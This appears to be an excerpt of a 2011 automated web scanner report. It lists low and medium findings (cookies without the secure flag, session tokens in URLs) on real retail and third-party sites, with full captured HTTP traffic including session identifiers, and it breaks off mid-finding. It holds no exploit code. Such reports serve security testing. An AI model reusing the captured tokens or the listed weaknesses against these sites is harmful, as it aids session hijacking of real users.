The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:10:10 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:10 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:18 GMT
Content-Length: 923

<script type="text/javascript">
       $(document).ready(function() {
           // Drop Down Banners with parameters for: banner div, cookie name, delay before appearing (in seconds), delay before disappearing (i
...[SNIP]...

10. Session token in URL  previous  next
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

10.2. http://t.p.mybuys.com/webrec/wr.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

10.3. http://www.acehardware.com/storeLocServ  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.acehardware.com
Path:   /storeLocServ

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=44.5&lon=-72.646&time=1305510862342 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
X-Prototype-Version: 1.4.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510830898}; __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305510836971%7C1308102836971%3B%20gpv_p27%3DHome%2520Page%7C1305512636976%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1305510861947

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/x-json
Content-Length: 33

{ "RESULTS" : []
,
"COUNT" : 12}

10.4. http://www.bluefly.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...



Welcome to Bluefly, <a title="login" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">login</a> or register
<a title="register" href="/myfly/login.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">here</a>
...[SNIP]...
<li id="navCS"><a href="/custom/custom.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12?promoId=m480129">Customer Service</a>
...[SNIP]...
<div id="navShopBag">
<a title="shopping bag" href="/cart/cart.jsp;jsessionid=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12">
<span id="textShopBag">
...[SNIP]...

10.5. http://www.bluefly.com/myfly/login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

10.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3c396bb9&origin=http%3A%2F%2Fwww.bluenile.com%2Ff315278f74&relation=parent&transport=postmessage&frame=fc3c3701
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.67
X-Cnection: close
Date: Mon, 16 May 2011 01:55:47 GMT
Content-Length: 0


10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm